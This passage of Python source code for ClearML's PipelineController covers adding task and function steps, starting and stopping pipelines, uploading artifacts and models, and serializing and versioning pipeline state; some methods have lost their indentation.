(or marked as failed). Notice, that steps that are connected (or indirectly connected)
to the failed step will be skipped.
:param pre_execute_callback: Callback function, called when the step (Task) is created
and before it is sent for execution. Allows a user to modify the Task before launch.
Use `node.job` to access the ClearmlJob object, or `node.job.task` to directly access the Task object.
`parameters` are the configuration arguments passed to the ClearmlJob.
If the callback returned value is `False`,
the Node is skipped and so is any node in the DAG that relies on this node.
Notice the `parameters` are already parsed,
e.g. `${step1.parameters.Args/param}` is replaced with relevant value.
.. code-block:: py
def step_created_callback(
pipeline, # type: PipelineController,
node, # type: PipelineController.Node,
parameters, # type: dict
):
pass
:param post_execute_callback: Callback function, called when a step (Task) is completed
and it other jobs are executed. Allows a user to modify the Task status after completion.
.. code-block:: py
def step_completed_callback(
pipeline, # type: PipelineController,
node, # type: PipelineController.Node,
):
pass
:param cache_executed_step: If True, before launching the new step,
after updating with the latest configuration, check if an exact Task with the same parameter/code
was already executed. If it was found, use it instead of launching a new Task.
Default: False, a new cloned copy of base_task is always used.
Notice: If the git repo reference does not have a specific commit ID, the Task will never be used.
If `clone_base_task` is False there is no cloning, hence the base_task is used.
:param base_task_factory: Optional, instead of providing a pre-existing Task,
provide a Callable function to create the Task (returns Task object)
:return: True if successful
"""
# always store callback functions (even when running remotely)
if pre_execute_callback:
self._pre_step_callbacks[name] = pre_execute_callback
if post_execute_callback:
self._post_step_callbacks[name] = post_execute_callback
# when running remotely do nothing, we will deserialize ourselves when we start
# if we are not cloning a Task, we assume this step is created from code, not from the configuration
if not base_task_factory and clone_base_task and self._has_stored_configuration():
return True
self._verify_node_name(name)
if not base_task_factory and not base_task_id:
if not base_task_project or not base_task_name:
raise ValueError('Either base_task_id or base_task_project/base_task_name must be provided')
base_task = Task.get_task(
project_name=base_task_project,
task_name=base_task_name,
allow_archived=True,
task_filter=dict(
status=[str(Task.TaskStatusEnum.created), str(Task.TaskStatusEnum.queued),
str(Task.TaskStatusEnum.in_progress), str(Task.TaskStatusEnum.published),
str(Task.TaskStatusEnum.stopped), str(Task.TaskStatusEnum.completed),
str(Task.TaskStatusEnum.closed)],
)
)
if not base_task:
raise ValueError('Could not find base_task_project={} base_task_name={}'.format(
base_task_project, base_task_name))
if Task.archived_tag in base_task.get_system_tags():
LoggerRoot.get_base_logger().warning(
'Found base_task_project={} base_task_name={} but it is archived'.format(
base_task_project, base_task_name))
base_task_id = base_task.id
if configuration_overrides is not None:
# verify we have a dict or a string on all values
if not isinstance(configuration_overrides, dict) or \
not all(isinstance(v, (str, dict)) for v in configuration_overrides.values()):
raise ValueError("configuration_overrides must be a dictionary, with all values "
"either dicts or strings, got \'{}\' instead".format(configuration_overrides))
if task_overrides:
task_overrides = flatten_dictionary(task_overrides, sep='.')
self._nodes[name] = self.Node(
name=name, base_task_id=base_task_id, parents=parents or [],
queue=execution_queue, timeout=time_limit,
parameters=parameter_override or {},
configurations=configuration_overrides,
clone_task=clone_base_task,
task_overrides=task_overrides,
cache_executed_step=cache_executed_step,
continue_on_fail=continue_on_fail,
task_factory_func=base_task_factory,
monitor_metrics=monitor_metrics or [],
monitor_artifacts=monitor_artifacts or [],
monitor_models=monitor_models or [],
)
if self._task and not self._task.running_locally():
self.update_execution_plot()
return True
def add_function_step(
self,
name, # type: str
function, # type: Callable
function_kwargs=None, # type: Optional[Dict[str, Any]]
function_return=None, # type: Optional[List[str]]
project_name=None, # type: Optional[str]
task_name=None, # type: Optional[str]
task_type=None, # type: Optional[str]
packages=None, # type: Optional[Union[str, Sequence[str]]]
repo=None, # type: Optional[str]
repo_branch=None, # type: Optional[str]
repo_commit=None, # type: Optional[str]
helper_functions=None, # type: Optional[Sequence[Callable]]
docker=None, # type: Optional[str]
docker_args=None, # type: Optional[str]
docker_bash_setup_script=None, # type: Optional[str]
parents=None, # type: Optional[Sequence[str]],
execution_queue=None, # type: Optional[str]
monitor_metrics=None, # type: Optional[List[Union[Tuple[str, str], Tuple[(str, str), (str, str)]]]]
monitor_artifacts=None, # type: Optional[List[Union[str, Tuple[str, str]]]]
monitor_models=None, # type: Optional[List[Union[str, Tuple[str, str]]]]
time_limit=None, # type: Optional[float]
continue_on_fail=False, # type: bool
pre_execute_callback=None, # type: Optional[Callable[[PipelineController, PipelineController.Node, dict], bool]] # noqa
post_execute_callback=None, # type: Optional[Callable[[PipelineController, PipelineController.Node], None]] # noqa
cache_executed_step=False, # type: bool
):
# type: (...) -> bool
"""
Create a Task from a function, including wrapping the function input arguments
into the hyper-parameter section as kwargs, and storing function results as named artifacts
Example:
def mock_func(a=6, b=9):
c = a*b
print(a, b, c)
return c, c**2
create_task_from_function(mock_func, function_return=['mul', 'square'])
Example arguments from other Tasks (artifact):
def mock_func(matrix_np):
c = matrix_np*matrix_np
print(matrix_np, c)
return c
create_task_from_function(
mock_func,
function_input_artifacts={'matrix_np': 'aabb1122.previous_matrix'},
function_return=['square_matrix']
)
:param name: Unique of the step. For example `stage1`
:param function: A global function to convert into a standalone Task
:param function_kwargs: Optional, provide subset of function arguments and default values to expose.
If not provided automatically take all function arguments & defaults
Optional, pass input arguments to the function from other Tasks's output artifact.
Example argument named `numpy_matrix` from Task ID `aabbcc` artifact name `answer`:
{'numpy_matrix': 'aabbcc.answer'}
:param function_return: Provide a list of names for all the results.
If not provided no results will be stored as artifacts.
:param project_name: Set the project name for the task. Required if base_task_id is None.
:param task_name: Set the name of the remote task. Required if base_task_id is None.
:param task_type: Optional, The task type to be created. Supported values: 'training', 'testing', 'inference',
'data_processing', 'application', 'monitor', 'controller', 'optimizer', 'service', 'qc', 'custom'
:param packages: Manually specify a list of required packages or a local requirements.txt file.
Example: ["tqdm>=2.1", "scikit-learn"] or "./requirements.txt"
If not provided, packages are automatically added based on the imports used in the function.
:param repo: Optional, specify a repository to attach to the function, when remotely executing.
Allow users to execute the function inside the specified repository, enabling to load modules/script
from a repository Notice the execution work directory will be the repository root folder.
Supports both git repo url link, and local repository path.
Example remote url: 'https://github.com/user/repo.git'
Example local repo copy: './repo' -> will automatically store the remote
repo url and commit ID based on the locally cloned copy
:param repo_branch: Optional, specify the remote repository branch (Ignored, if local repo path is used)
:param repo_commit: Optional, specify the repository commit id (Ignored, if local repo path is used)
:param helper_functions: Optional, a list of helper functions to make available
for the standalone function Task.
:param docker: Select the docker image to be executed in by the remote session
:param docker_args: Add docker arguments, pass a single string
:param docker_bash_setup_script: Add bash script to be executed
inside the docker before setting up the Task's environment
:param parents: Optional list of parent nodes in the DAG.
The current step in the pipeline will be sent for execution only after all the parent nodes
have been executed successfully.
:param execution_queue: Optional, the queue to use for executing this specific step.
If not provided, the task will be sent to the default execution queue, as defined on the class
:param monitor_metrics: Optional, log the step's metrics on the pipeline Task.
Format is a list of pairs metric (title, series) to log:
[(step_metric_title, step_metric_series), ]
Example: [('test', 'accuracy'), ]
Or a list of tuple pairs, to specify a different target metric for to use on the pipeline Task:
[((step_metric_title, step_metric_series), (target_metric_title, target_metric_series)), ]
Example: [[('test', 'accuracy'), ('model', 'accuracy')], ]
:param monitor_artifacts: Optional, log the step's artifacts on the pipeline Task.
Provided a list of artifact names existing on the step's Task, they will also appear on the Pipeline itself.
Example: [('processed_data', 'final_processed_data'), ]
Alternatively user can also provide a list of artifacts to monitor
(target artifact name will be the same as original artifact name)
Example: ['processed_data', ]
:param monitor_models: Optional, log the step's output models on the pipeline Task.
Provided a list of model names existing on the step's Task, they will also appear on the Pipeline itself.
Example: [('model_weights', 'final_model_weights'), ]
Alternatively user can also provide a list of models to monitor
(target models name will be the same as original model)
Example: ['model_weights', ]
To select the latest (lexicographic) model use "model_*", or the last created model with just "*"
Example: ['model_weights_*', ]
:param time_limit: Default None, no time limit.
Step execution time limit, if exceeded the Task is aborted and the pipeline is stopped and marked failed.
:param continue_on_fail: (default False). If True, failed step will not cause the pipeline to stop
(or marked as failed). Notice, that steps that are connected (or indirectly connected)
to the failed step will be skipped.
:param pre_execute_callback: Callback function, called when the step (Task) is created
and before it is sent for execution. Allows a user to modify the Task before launch.
Use `node.job` to access the ClearmlJob object, or `node.job.task` to directly access the Task object.
`parameters` are the configuration arguments passed to the ClearmlJob.
If the callback returned value is `False`,
the Node is skipped and so is any node in the DAG that relies on this node.
Notice the `parameters` are already parsed,
e.g. `${step1.parameters.Args/param}` is replaced with relevant value.
.. code-block:: py
def step_created_callback(
pipeline, # type: PipelineController,
node, # type: PipelineController.Node,
parameters, # type: dict
):
pass
:param post_execute_callback: Callback function, called when a step (Task) is completed
and it other jobs are executed. Allows a user to modify the Task status after completion.
.. code-block:: py
def step_completed_callback(
pipeline, # type: PipelineController,
node, # type: PipelineController.Node,
):
pass
:param cache_executed_step: If True, before launching the new step,
after updating with the latest configuration, check if an exact Task with the same parameter/code
was already executed. If it was found, use it instead of launching a new Task.
Default: False, a new cloned copy of base_task is always used.
Notice: If the git repo reference does not have a specific commit ID, the Task will never be used.
:return: True if successful
"""
# always store callback functions (even when running remotely)
if pre_execute_callback:
self._pre_step_callbacks[name] = pre_execute_callback
if post_execute_callback:
self._post_step_callbacks[name] = post_execute_callback
self._verify_node_name(name)
function_kwargs = function_kwargs or {}
function_input_artifacts = {}
# go over function_kwargs, split it into string and input artifacts
for k, v in function_kwargs.items():
if v and self._step_ref_pattern.match(str(v)):
# check for step artifacts
step, _, artifact = v[2:-1].partition('.')
if step in self._nodes and artifact in self._nodes[step].return_artifacts:
function_input_artifacts[k] = "${{{}.id}}.{}".format(step, artifact)
continue
# verify the reference
self.__verify_step_reference(node=self.Node(name=name), step_ref_string=v)
function_kwargs = {k: v for k, v in function_kwargs.items() if k not in function_input_artifacts}
parameters = {"{}/{}".format(CreateFromFunction.kwargs_section, k): v for k, v in function_kwargs.items()}
if function_input_artifacts:
parameters.update(
{"{}/{}".format(CreateFromFunction.input_artifact_section, k): str(v)
for k, v in function_input_artifacts.items()}
)
if self._mock_execution:
project_name = project_name or self._target_project or self._task.get_project_name()
task_definition = self._create_task_from_function(
docker, docker_args, docker_bash_setup_script, function,
function_input_artifacts, function_kwargs,
function_return, packages, project_name, task_name,
task_type, repo, repo_branch, repo_commit, helper_functions)
elif self._task.running_locally():
project_name = project_name or self._target_project or self._task.get_project_name()
task_definition = self._create_task_from_function(
docker, docker_args, docker_bash_setup_script, function,
function_input_artifacts, function_kwargs,
function_return, packages, project_name, task_name,
task_type, repo, repo_branch, repo_commit, helper_functions)
# update configuration with the task definitions
# noinspection PyProtectedMember
self._task._set_configuration(
name=name, config_type='json',
config_text=json.dumps(task_definition, indent=1)
)
else:
# load task definition from configuration
# noinspection PyProtectedMember
task_definition = json.loads(self._task._get_configuration_text(name=name))
def _create_task(_):
a_task = Task.create(
project_name=project_name,
task_name=task_definition.get('name'),
task_type=task_definition.get('type'),
)
# replace reference
a_task.update_task(task_definition)
return a_task
self._nodes[name] = self.Node(
name=name, base_task_id=None, parents=parents or [],
queue=execution_queue, timeout=time_limit,
parameters=parameters,
clone_task=False,
cache_executed_step=cache_executed_step,
task_factory_func=_create_task,
continue_on_fail=continue_on_fail,
return_artifacts=function_return,
monitor_artifacts=monitor_artifacts,
monitor_metrics=monitor_metrics,
monitor_models=monitor_models,
)
if self._task and not self._task.running_locally() and not self._mock_execution:
self.update_execution_plot()
return True
    def start(
            self,
            queue='services',
            step_task_created_callback=None,  # type: Optional[Callable[[PipelineController, PipelineController.Node, dict], bool]]  # noqa
            step_task_completed_callback=None,  # type: Optional[Callable[[PipelineController, PipelineController.Node], None]]  # noqa
            wait=True,
    ):
        # type: (...) -> bool
        """
        Start the current pipeline remotely (on the selected services queue).
        The current process will be stopped and launched remotely.
        :param queue: queue name to launch the pipeline on
        :param Callable step_task_created_callback: Callback function, called when a step (Task) is created
            and before it is sent for execution. Allows a user to modify the Task before launch.
            Use `node.job` to access the ClearmlJob object, or `node.job.task` to directly access the Task object.
            `parameters` are the configuration arguments passed to the ClearmlJob.
            If the callback returned value is `False`,
            the Node is skipped and so is any node in the DAG that relies on this node.
            Notice the `parameters` are already parsed,
            e.g. `${step1.parameters.Args/param}` is replaced with relevant value.
            .. code-block:: py
                def step_created_callback(
                    pipeline,  # type: PipelineController,
                    node,  # type: PipelineController.Node,
                    parameters,  # type: dict
                ):
                    pass
        :param Callable step_task_completed_callback: Callback function, called when a step (Task) is completed
            and before the following steps are executed. Allows a user to modify the Task status after completion.
            .. code-block:: py
                def step_completed_callback(
                    pipeline,  # type: PipelineController,
                    node,  # type: PipelineController.Node,
                ):
                    pass
        :param wait: If True (default), start the pipeline controller, return only
            after the pipeline is done (completed/aborted/failed)
        :return: True, if the controller started. False, if the controller did not start.
        """
        if not self._task:
            raise ValueError(
                "Could not find main Task, "
                "PipelineController must be created with `always_create_task=True`")
        # serialize state only if we are running locally
        if Task.running_locally() or not self._task.is_main_task():
            self._verify()
            self._serialize_pipeline_task()
            self.update_execution_plot()
        # stop current Task and execute remotely or no-op
        # NOTE: with exit_process=True this call terminates the local process when
        # running locally; everything below only runs in the remote execution.
        self._task.execute_remotely(queue_name=queue, exit_process=True, clone=False)
        # remote execution: run the pipeline logic itself
        if not Task.running_locally() and self._task.is_main_task():
            self._start(
                step_task_created_callback=step_task_created_callback,
                step_task_completed_callback=step_task_completed_callback,
                wait=wait
            )
        return True
def start_locally(self, run_pipeline_steps_locally=False):
# type: (bool) -> None
"""
Start the current pipeline locally, meaning the pipeline logic is running on the current machine,
instead of on the `services` queue.
Using run_pipeline_steps_locally=True you can run all the pipeline steps locally as sub-processes.
Notice: when running pipeline steps locally, it assumes local code execution
(i.e. it is running the local code as is, regardless of the git commit/diff on the pipeline steps Task)
:param run_pipeline_steps_locally: (default False) If True, run the
pipeline steps themselves locally as a subprocess (use for debugging the pipeline locally,
notice the pipeline code is expected to be available on the local machine)
"""
if not self._task:
raise ValueError(
"Could not find main Task, "
"PipelineController must be created with `always_create_task=True`")
if run_pipeline_steps_locally:
self._clearml_job_class = LocalClearmlJob
self._default_execution_queue = self._default_execution_queue or 'mock'
# serialize state only if we are running locally
self._verify()
self._serialize_pipeline_task()
self.update_execution_plot()
self._start(wait=True)
    def create_draft(self):
        # type: () -> None
        """
        Optional, manually create & serialize the Pipeline Task.
        After calling Pipeline.create(), users can edit the pipeline in the UI and enqueue it for execution.
        Notice: this function should be used to programmatically create pipeline for later usage.
        To automatically create and launch pipelines, call the `start()` method.
        """
        self._verify()
        self._serialize_pipeline_task()
        # close the Task then reset it, leaving it in draft state
        # so it can be edited/enqueued from the UI (order matters here)
        self._task.close()
        self._task.reset()
@classmethod
def get_logger(cls):
# type: () -> Logger
"""
Return a logger connected to the Pipeline Task.
The logger can be used by any function/tasks executed by the pipeline, in order to report
directly to the pipeline Task itself. It can also be called from the main pipeline control Task.
Raise ValueError if main Pipeline task could not be located.
:return: Logger object for reporting metrics (scalars, plots, debug samples etc.)
"""
return cls._get_pipeline_task().get_logger()
@classmethod
def upload_model(cls, model_name, model_local_path):
    # type: (str, str) -> OutputModel
    """
    Upload (add) a model to the main Pipeline Task object.

    Can be called from any pipeline component to register models directly on the
    main pipeline Task. The model file/path is uploaded to the Pipeline Task and
    registered on the model repository.

    :param model_name: Model name as it will appear in the model registry (in the pipeline's project)
    :param model_local_path: Path to the local model file or directory to be uploaded.
        A directory is packaged (recursively) into a zip file before upload.
    :raises ValueError: if the main Pipeline Task could not be located
    :return: The registered OutputModel
    """
    pipeline_task = cls._get_pipeline_task()
    weights_path = Path(model_local_path).as_posix()
    output_model = OutputModel(task=pipeline_task, name=str(model_name))
    output_model.update_weights(weights_filename=weights_path)
    return output_model
@classmethod
def upload_artifact(
    cls,
    name,  # type: str
    artifact_object,  # type: Any
    metadata=None,  # type: Optional[Mapping]
    delete_after_upload=False,  # type: bool
    auto_pickle=True,  # type: bool
    preview=None,  # type: Any
    wait_on_upload=False,  # type: bool
):
    # type: (...) -> bool
    """
    Upload (add) an artifact to the main Pipeline Task object.

    Can be called from any pipeline component (or from the main pipeline control Task)
    to add artifacts directly onto the main pipeline Task.

    Supported artifact types:

    - string / Path - A path to an artifact file. A wildcard or folder is zipped and uploaded.
    - dict - Stored as a ``.json`` file and uploaded.
    - pandas.DataFrame - Stored as a ``.csv.gz`` (compressed CSV) file and uploaded.
    - numpy.ndarray - Stored as an ``.npz`` file and uploaded.
    - PIL.Image - Stored as a ``.png`` file and uploaded.
    - Any - With ``auto_pickle=True``, the object is pickled and uploaded.

    :param str name: The artifact name.

        .. warning::
            An artifact previously uploaded with the same name is overwritten.

    :param object artifact_object: The artifact object.
    :param dict metadata: Key-value metadata shown with the experiment in the
        **ClearML Web-App (UI)**, **ARTIFACTS** tab.
    :param bool delete_after_upload: If True, delete the local copy after upload. (default False)
    :param bool auto_pickle: If True (default) and the artifact_object is not one of:
        pathlib2.Path, dict, pandas.DataFrame, numpy.ndarray, PIL.Image, url (string),
        local_file (string) - pickle the object and upload it as a ``.pkl`` file artifact.
    :param Any preview: The artifact preview
    :param bool wait_on_upload: If True, make the upload synchronous (block until complete).
    :raises ValueError: if the main Pipeline Task could not be located, or the artifact
        object type is not supported
    :return: True if the upload succeeded, False otherwise.
    """
    pipeline_task = cls._get_pipeline_task()
    upload_kwargs = dict(
        name=name,
        artifact_object=artifact_object,
        metadata=metadata,
        delete_after_upload=delete_after_upload,
        auto_pickle=auto_pickle,
        preview=preview,
        wait_on_upload=wait_on_upload,
    )
    return pipeline_task.upload_artifact(**upload_kwargs)
def stop(self, timeout=None, mark_failed=False, mark_aborted=False):
    # type: (Optional[float], bool, bool) -> ()
    """
    Stop the pipeline controller and the optimization thread.

    If both ``mark_failed`` and ``mark_aborted`` are False (default), the pipeline
    is marked completed, unless one of the steps failed, in which case the pipeline
    is marked failed.

    :param timeout: Wait timeout for the optimization thread to exit (minutes).
        The default is ``None``, indicating do not wait, terminate immediately.
    :param mark_failed: If True, mark the pipeline task as failed. (default False)
    :param mark_aborted: If True, mark the pipeline task as aborted. (default False)
    """
    # bug fix: _stop_event is only created in _prepare_pipeline(); guard so that
    # calling stop() on a never-started controller does not raise AttributeError
    if self._stop_event:
        self._stop_event.set()
    self.wait(timeout=timeout)
    if not self._task:
        return
    self._task.close()
    if mark_failed:
        self._task.mark_failed(status_reason='Pipeline aborted and failed', force=True)
    elif mark_aborted:
        self._task.mark_aborted(status_reason='Pipeline aborted', force=True)
    elif self._pipeline_task_status_failed:
        print('Setting pipeline controller Task as failed (due to failed steps) !')
        self._task.mark_failed(status_reason='Pipeline step failed', force=True)
def wait(self, timeout=None):
    # type: (Optional[float]) -> bool
    """
    Wait for the pipeline to finish.

    .. note::
        This method does not stop the pipeline. Call :meth:`stop` to terminate the pipeline.

    :param float timeout: Timeout in minutes to wait for the pipeline to complete.
        If ``None``, wait indefinitely until the pipeline completes.
    :return: True if the pipeline finished, False if the wait timed out.
    """
    if not self.is_running():
        return True
    worker = self._thread
    join_timeout = None if timeout is None else timeout * 60.
    worker.join(timeout=join_timeout)
    return not worker.is_alive()
def is_running(self):
    # type: () -> bool
    """
    Return whether the pipeline controller is active.

    :return: True if the controller thread exists and is still running, False otherwise.
    """
    worker = self._thread
    if worker is None:
        return False
    return worker.is_alive()
def is_successful(self):
    # type: () -> bool
    """
    Return whether the pipeline fully executed and none of the steps/Tasks failed.

    :return: Truthy iff the controller was started, is no longer running, and no step failed.
    """
    # preserve original short-circuit semantics (falsy when the thread was never started)
    if not self._thread:
        return self._thread
    return not self.is_running() and not self._pipeline_task_status_failed
def elapsed(self):
    # type: () -> float
    """
    Return the number of minutes elapsed since the controller start time stamp.

    :return: Minutes since controller start time; -1.0 if the process has not started yet.
    """
    started = self._start_time
    if started is None:
        return -1.0
    return (time() - started) / 60.
def get_pipeline_dag(self):
    # type: () -> Mapping[str, PipelineController.Node]
    """
    Return the pipeline execution graph. Each node in the DAG is a
    PipelineController.Node object; the graph is a dictionary keyed by node name,
    and each node holds links to its parent nodes (identified by their unique names).

    :return: execution tree, as a nested dictionary. Example:

    .. code-block:: py

        {
            'stage1' : Node() {
                name: 'stage1'
                job: ClearmlJob
                ...
            },
        }
    """
    return self._nodes
def get_processed_nodes(self):
    # type: () -> Mapping[str, PipelineController.Node]
    """
    Return the processed pipeline nodes as a dictionary of
    node-name -> PipelineController.Node (despite the historical "list" wording,
    the return value is a dict).

    :return: executed (excluding currently executing) nodes, keyed by node name
    """
    processed = {}
    for name, node in self._nodes.items():
        if node.executed:
            processed[name] = node
    return processed
def get_running_nodes(self):
    # type: () -> Mapping[str, PipelineController.Node]
    """
    Return the currently running pipeline nodes as a dictionary of
    node-name -> PipelineController.Node (despite the historical "list" wording,
    the return value is a dict).

    :return: currently running nodes, keyed by node name
    """
    running = {}
    for name, node in self._nodes.items():
        if name in self._running_nodes:
            running[name] = node
    return running
def update_execution_plot(self):
    # type: () -> ()
    """
    Update the sankey diagram of the current pipeline, then rescan monitored nodes.
    """
    with self._reporting_lock:
        self._update_execution_plot()
    # trigger the node monitor scan after the plot refresh
    self._scan_monitored_nodes()
def add_parameter(self, name, default=None, description=None):
    # type: (str, Optional[Any], Optional[str]) -> None
    """
    Add a parameter to the pipeline Task.

    The parameter can be used as an input parameter for any step in the pipeline.
    Note: all parameters will appear under the PipelineController Task's
    Hyper-parameters -> Pipeline section.

    Example: pipeline.add_parameter(name='dataset', description='dataset ID to process the pipeline')
    A step can then refer to the parameter value with '${pipeline.dataset}'

    :param name: String name of the parameter.
    :param default: Default value to be put as the default value (can be later changed in the UI)
    :param description: String description of the parameter and its usage in the pipeline
    """
    # bug fix: preserve falsy defaults (0, False, 0.0) instead of collapsing them
    # to '' as `str(default or '')` did; only None maps to the empty string
    self._pipeline_args[str(name)] = '' if default is None else str(default)
    if description:
        self._pipeline_args_desc[str(name)] = str(description)
def get_parameters(self):
    # type: () -> dict
    """
    Return the pipeline parameters dictionary.

    :return: Dictionary str -> str
    """
    return self._pipeline_args
def _create_task_from_function(
        self, docker, docker_args, docker_bash_setup_script,
        function, function_input_artifacts, function_kwargs, function_return,
        packages, project_name, task_name, task_type, repo, branch, commit, helper_functions
):
    """
    Build a (dry-run) Task definition dictionary out of a python function.

    Delegates to CreateFromFunction.create_task_from_function with dry_run=True,
    so no Task is actually created on the server.

    :return: Task definition dictionary
    """
    return CreateFromFunction.create_task_from_function(
        a_function=function,
        function_kwargs=function_kwargs or None,
        function_input_artifacts=function_input_artifacts,
        function_return=function_return,
        project_name=project_name,
        task_name=task_name,
        task_type=task_type,
        repo=repo,
        branch=branch,
        commit=commit,
        packages=packages,
        docker=docker,
        docker_args=docker_args,
        docker_bash_setup_script=docker_bash_setup_script,
        output_uri=None,
        helper_functions=helper_functions,
        dry_run=True,
    )
def _start(
self,
step_task_created_callback=None, # type: Optional[Callable[[PipelineController, PipelineController.Node, dict], bool]] # noqa
step_task_completed_callback=None, # type: Optional[Callable[[PipelineController, PipelineController.Node], None]] # noqa
wait=True,
):
# type: (...) -> bool
"""
Start the pipeline controller.
If the calling process is stopped, then the controller stops as well.
:param Callable step_task_created_callback: Callback function, called when a step (Task) is created
and before it is sent for execution. Allows a user to modify the Task before launch.
Use `node.job` to access the ClearmlJob object, or `node.job.task` to directly access the Task object.
`parameters` are the configuration arguments passed to the ClearmlJob.
If the callback returned value is `False`,
the Node is skipped and so is any node in the DAG that relies on this node.
Notice the `parameters` are already parsed,
e.g. `${step1.parameters.Args/param}` is replaced with relevant value.
.. code-block:: py
def step_created_callback(
pipeline, # type: PipelineController,
node, # type: PipelineController.Node,
parameters, # type: dict
):
pass
:param Callable step_task_completed_callback: Callback function, called when a step (Task) is completed
and it other jobs are executed. Allows a user to modify the Task status after completion.
.. code-block:: py
def step_completed_callback(
pipeline, # type: PipelineController,
node, # type: PipelineController.Node,
):
pass
:param wait: If True (default), start the pipeline controller, return only
after the pipeline is done (completed/aborted/failed)
:return: True, if the controller started. False, if the controller did not start.
"""
if self._thread:
return True
self._prepare_pipeline(step_task_completed_callback, step_task_created_callback)
self._thread = Thread(target=self._daemon)
self._thread.daemon = True
self._thread.start()
if wait:
self.wait()
self.stop()
return True
def _prepare_pipeline(
    self,
    step_task_created_callback=None,  # type: Optional[Callable[[PipelineController, PipelineController.Node, dict], bool]]  # noqa
    step_task_completed_callback=None,  # type: Optional[Callable[[PipelineController, PipelineController.Node], None]]  # noqa
):
    # type: (...) -> None
    """
    Serialize/restore the pipeline state and initialize the controller runtime.

    Serializes the pipeline into the main Task, restores the DAG dictionary back
    (clearing 'executed' markers on a fresh run, re-enabling failed steps on a
    continued run), verifies the DAG, and sets up the start time, stop event and
    step callbacks used by the daemon loop.

    :param step_task_created_callback: Called when a step Task is created, before launch.
    :param step_task_completed_callback: Called when a step Task completes.
    :raises ValueError: if the execution graph is invalid (inaccessible nodes or cycles)
    """
    params, pipeline_dag = self._serialize_pipeline_task()
    # deserialize back pipeline state
    if not params['_continue_pipeline_']:
        # fresh run: drop any 'executed' markers restored from a previous serialization
        for k in pipeline_dag:
            pipeline_dag[k]['executed'] = None
    self._default_execution_queue = params['_default_queue_']
    self._add_pipeline_tags = params['_add_pipeline_tags_']
    self._target_project = params['_target_project_'] or ''
    self._deserialize(pipeline_dag)
    # if we continue the pipeline, make sure that we re-execute failed tasks
    if params['_continue_pipeline_']:
        for node in list(self._nodes.values()):
            # executed is False (not None) only for failed steps - clear to re-run them
            if node.executed is False:
                node.executed = None
    if not self._verify():
        raise ValueError("Failed verifying pipeline execution graph, "
                         "it has either inaccessible nodes, or contains cycles")
    self.update_execution_plot()
    self._start_time = time()
    self._stop_event = Event()
    self._experiment_created_cb = step_task_created_callback
    self._experiment_completed_cb = step_task_completed_callback
def _serialize_pipeline_task(self):
    # type: () -> (dict, dict)
    """
    Serialize current pipeline state into the main Task.

    When running locally: store the DAG as a Task configuration object, push the
    pipeline args/params as Task parameters, verify/bump the pipeline version, and
    stamp a content-hash runtime property. When running remotely: connect back the
    stored configuration/parameters and decide whether this run is a continuation
    (based on the presence of the runtime hash property).

    :return: params, pipeline_dag
    """
    params = {
        '_default_queue_': self._default_execution_queue,
        '_add_pipeline_tags_': self._add_pipeline_tags,
        '_target_project_': self._target_project,
    }
    pipeline_dag = self._serialize()
    # serialize pipeline state
    # NOTE(review): '_continue_pipeline_' is only set inside this branch; callers
    # appear to assume _task/_auto_connect_task are always set - confirm
    if self._task and self._auto_connect_task:
        if self._task.running_locally():
            # local run: push the DAG into the Task configuration section
            # noinspection PyProtectedMember
            self._task._set_configuration(
                name=self._config_section, config_type='dictionary',
                config_text=json.dumps(pipeline_dag, indent=2))
            params.update(self._pipeline_args)
            # noinspection PyProtectedMember
            self._task._set_parameters(
                {'{}/{}'.format(self._args_section, k): str(v) for k, v in params.items()},
                __parameters_descriptions=self._pipeline_args_desc,
                __update=True,
            )
            params['_continue_pipeline_'] = False
            # make sure we have a unique version number (auto bump version if needed)
            # only needed when manually (from code) creating pipelines
            self._verify_pipeline_version()
            # noinspection PyProtectedMember
            pipeline_hash = self._get_task_hash()
            # noinspection PyProtectedMember
            self._task._set_runtime_properties({
                self._runtime_property_hash: "{}:{}".format(pipeline_hash, self._version),
            })
        else:
            # remote run: pull back the stored configuration and parameters
            self._task.connect_configuration(pipeline_dag, name=self._config_section)
            self._task.connect(self._pipeline_args, name=self._args_section)
            self._task.connect(params, name=self._args_section)
            # noinspection PyProtectedMember
            if self._task._get_runtime_properties().get(self._runtime_property_hash):
                # hash already stamped: this is a continued (re-enqueued) pipeline run
                params['_continue_pipeline_'] = True
            else:
                # first remote run: stamp the hash so a future re-enqueue is detected
                # noinspection PyProtectedMember
                pipeline_hash = ClearmlJob._create_task_hash(self._task)
                # noinspection PyProtectedMember
                self._task._set_runtime_properties({
                    self._runtime_property_hash: "{}:{}".format(pipeline_hash, self._version),
                })
                params['_continue_pipeline_'] = False
    return params, pipeline_dag
def _verify_pipeline_version(self):
    """
    Ensure the pipeline version is consistent with its content hash, bumping it if needed.

    If auto version bump is disabled, only record the current version as a Task user
    property. Otherwise query existing (non-archived) pipeline Tasks with the same
    name/type: when a Task holds the same version but a different hash, scan all
    sibling pipelines and either adopt the version whose hash matches ours, or bump
    the last version component until an unused version is found.
    """
    # if no version bump needed, just set the property
    if not self._auto_version_bump:
        self._task.set_user_properties(version=self._version)
        return
    # check if pipeline version exists, if it does increase version
    pipeline_hash = self._get_task_hash()
    # noinspection PyProtectedMember
    existing_tasks = Task._query_tasks(
        project=[self._task.project], task_name=exact_match_regex(self._task.name),
        type=[str(self._task.task_type)],
        system_tags=['-{}'.format(Task.archived_tag), self._tag],
        _all_=dict(fields=['runtime.{}'.format(self._runtime_property_hash)],
                   pattern=":{}".format(self._version)),
        only_fields=['id', 'runtime'],
    )
    if existing_tasks:
        # check if hash match the current version.
        matched = True
        for t in existing_tasks:
            # runtime property format is "<hash>:<version>"
            h, _, v = t.runtime.get(self._runtime_property_hash, '').partition(':')
            if v == self._version:
                matched = bool(h == pipeline_hash)
                break
        # if hash did not match, look for the highest version
        if not matched:
            # noinspection PyProtectedMember
            existing_tasks = Task._query_tasks(
                project=[self._task.project], task_name=exact_match_regex(self._task.name),
                type=[str(self._task.task_type)],
                system_tags=['-{}'.format(Task.archived_tag), self._tag],
                only_fields=['id', 'hyperparams', 'runtime'],
            )
            found_match_version = False
            existing_versions = set([self._version])  # noqa
            for t in existing_tasks:
                if not t.hyperparams:
                    continue
                v = t.hyperparams.get('properties', {}).get('version')
                if v:
                    existing_versions.add(v.value)
                if t.runtime:
                    h, _, _ = t.runtime.get(self._runtime_property_hash, '').partition(':')
                    if h == pipeline_hash:
                        # NOTE(review): assumes a matching-hash Task always carries a
                        # 'version' property (v not None here) - TODO confirm
                        self._version = v.value
                        found_match_version = True
                        break
            # match to the version we found:
            if found_match_version:
                getLogger('clearml.automation.controller').info(
